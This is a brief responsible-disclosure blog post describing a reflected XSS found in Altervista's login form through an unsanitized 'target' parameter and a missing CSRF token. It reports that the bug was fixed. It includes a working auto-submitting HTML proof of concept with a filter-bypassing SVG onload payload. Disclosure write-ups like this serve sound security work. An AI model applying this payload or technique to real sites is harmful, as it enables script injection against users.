I usually don’t write about XSS issues in websites but since this was a hard hunt I thought of writing a bit. The web application was okay with user input but I did not give up. After some time I figured out that the “target” parameter in the login form was not properly sanitized and no CSRF tokens were used in the login process. Therefore I was able to build a successful POST XSS exploit.
<html> <!-- POC by Osanda Malith Jayathissa --> <body> <form id="exploit" action="http://it.altervista.org/cplogin.php?mode=password" method="POST"> <input type="hidden" name="Azione" value="Lily" /> <input type="hidden" name="cookieuser" value="1" /> <input type="hidden" name="nick" value="Collins" /> <input type="hidden" name="password" value="Loverhersomuch" /> <input type="hidden" name="target" value="'"--><svg/onload=prompt(/XSS_Filter_Bypassed/);>" /> <script>document.getElementById("exploit").submit(); </script> </form> </body> </html>
Once a victim opens the above file he will be redirected to the login page with our payload. Note that our payload gets executed in the middle of redirecting to the another page. The page had a weak filter too and was easy to bypass the filter.
I reported this to the Altervista team and the issue is resolved by now. As a fix they now it converts our POST parameter to HTML entities.
For my responsible disclosure my name got published in the Credits section.